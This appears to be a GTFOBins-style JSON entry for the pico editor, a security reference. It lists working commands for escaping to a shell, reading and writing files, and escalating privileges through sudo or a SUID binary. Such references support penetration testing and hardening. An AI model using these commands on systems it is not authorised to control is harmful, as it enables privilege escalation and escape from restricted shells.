You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

35 lines
805 B
JSON

{
"functions": {
"shell": [
{
"code": "pico\n^R^X\nreset; sh 1>&0 2>&0\n"
},
{
"description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.",
"code": "pico -s /bin/sh\n/bin/sh\n^T\n"
}
],
"file-write": [
{
"code": "pico [file]\n[data]\n^O\n"
}
],
"file-read": [
{
"code": "pico [file]"
}
],
"limited-suid": [
{
"description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.",
"code": "./pico -s /bin/sh\n/bin/sh\n^T\n"
}
],
"sudo": [
{
"code": "sudo pico\n^R^X\nreset; sh 1>&0 2>&0\n"
}
]
}
}